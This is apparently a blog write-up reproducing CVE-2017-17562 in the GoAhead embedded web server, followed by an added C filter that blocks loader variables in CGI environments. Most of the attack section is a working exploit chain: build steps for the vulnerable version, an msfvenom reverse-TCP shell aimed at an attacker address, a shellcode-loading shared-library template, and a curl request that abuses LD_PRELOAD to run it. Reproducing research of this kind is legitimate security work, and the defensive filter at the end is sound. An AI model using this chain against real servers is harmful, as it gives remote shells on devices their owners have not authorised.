goahead embedded web server CVE-2017-17562 vulnerability reproduction

2018-03-01 02:18:27 Steven Xeldax

## goahead embedded web server CVE-2017-17562

### Reproducing the vulnerability:

```
git clone https://github.com/embedthis/goahead.git
cd goahead/
git checkout tags/v3.6.4 -q
make > /dev/null
```

```
cd test
gcc ./cgitest.c -o cgi-bin/cgitest
```

Note that route.txt and auth.txt from the test directory at the repository root must both be copied into the build's bin directory.

Run:

> ../build/linux-x64-default/bin/goahead

### Exploiting the vulnerability:

> python makemyday.py --server 10.0.3.119 --port 80 exploit --payload ./payloads/X86_64-hw.so

This tool checks whether the target is vulnerable; it can be downloaded from https://www.exploit-db.com/exploits/43360/

To get a shell, first generate the payload with msf:

> msfvenom -p linux/x64/shell/reverse_tcp lhost=192.168.200.1 lport=4443 -f c

Compile it into a reverse-shell shared library. Payload template:

```
#include <unistd.h>
#include <stdlib.h>

static void before_main(void) __attribute__((constructor));

static void before_main(void) {
    // paste the msf-generated shellcode here as an array named buf
    // then load the buf shellcode and execute it
    ((void(*)(void))&buf)();
}
```

> gcc -shared -fPIC ./payload.c -o payload.so -z execstack

Send the reverse-shell shared library to goahead on the kali box:

> curl -X POST --data-binary @payload.so http://192.168.200.128/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i | head

### Vulnerability details:

https://www.elttam.com.au/blog/goahead/

http://www.freebuf.com/articles/web/157846.html

### Postscript:

After getting a shell, disconnecting it makes goahead core dump:

```
*** Error in `./goahead': double free or corruption (fasttop): 0x000000000244f280 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fc13ef7f7e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7fc13ef8837a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7fc13ef8c53c]
/root/vul_goAhead/goahead/build/linux-x64-default/bin/libgo.so(wfree+0x1f)[0x7fc13f2ec36c]
/root/vul_goAhead/goahead/build/linux-x64-default/bin/libgo.so(websError+0x21a)[0x7fc13f2fb54d]
/root/vul_goAhead/goahead/build/linux-x64-default/bin/libgo.so(websCgiPoll+0xa8)[0x7fc13f2efedd]
/root/vul_goAhead/goahead/build/linux-x64-default/bin/libgo.so(websServiceEvents+0x4d)[0x7fc13f2f61a1]
./goahead(main+0x561)[0x401567]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fc13ef28830]
./goahead(_start+0x29)[0x400f39]
Aborted (core dumped)
```
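The exploit above works because the CGI handler exports request query parameters as environment variables for the CGI child, so `LD_PRELOAD=/proc/self/fd/0` points the dynamic loader at the POST body waiting on the child's stdin. The following is an added illustration of the defensive filter such a handler needs, not GoAhead's own code; `cgi_param`, `cgi_env_name_allowed` and `build_cgi_env` are hypothetical names, and the query in `main` is constructed from the page's curl request.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added illustration, not GoAhead's own source. A CGI handler that copies query
 * parameters into the child's environment must refuse loader-controlled names,
 * or ?LD_PRELOAD=/proc/self/fd/0 makes ld.so load the POST body (the child's
 * stdin) as a shared object: CVE-2017-17562. */
typedef struct { const char *name; const char *value; } cgi_param;

/* Return 1 if NAME may be exported to the CGI child's environment. */
int cgi_env_name_allowed(const char *name)
{
    static const char *blocked_prefix[] = { "LD_", "DYLD_", NULL };
    if (name == NULL || *name == '\0')
        return 0;
    /* Only [A-Za-z0-9_]: any other byte could forge a second variable
     * when the handler concatenates NAME=VALUE. */
    for (size_t i = 0; name[i]; i++)
        if (!isalnum((unsigned char)name[i]) && name[i] != '_')
            return 0;
    for (size_t i = 0; blocked_prefix[i]; i++)
        if (strncmp(name, blocked_prefix[i], strlen(blocked_prefix[i])) == 0)
            return 0;
    return 1;
}

/* Fill OUT with "NAME=value" strings for parameters that pass the filter;
 * returns how many were exported (a real server should log the dropped ones). */
int build_cgi_env(const cgi_param *p, int n, char out[][256], int max_out)
{
    int exported = 0;
    for (int i = 0; i < n && exported < max_out; i++) {
        if (!cgi_env_name_allowed(p[i].name))
            continue;
        snprintf(out[exported], 256, "%s=%s", p[i].name, p[i].value);
        exported++;
    }
    return exported;
}

int main(void)
{
    /* Constructed request: the page's exploit parameter plus a benign one. */
    cgi_param q[] = { { "LD_PRELOAD", "/proc/self/fd/0" }, { "user", "bob" } };
    char env[4][256];
    int n = build_cgi_env(q, 2, env, 4);
    for (int i = 0; i < n; i++)
        printf("exported: %s\n", env[i]);
    return 0;
}
```

A prefix denylist is the minimum; a stricter handler would only export an allowlist of expected parameter names or prefix every user-supplied name so it can never collide with a loader or shell variable.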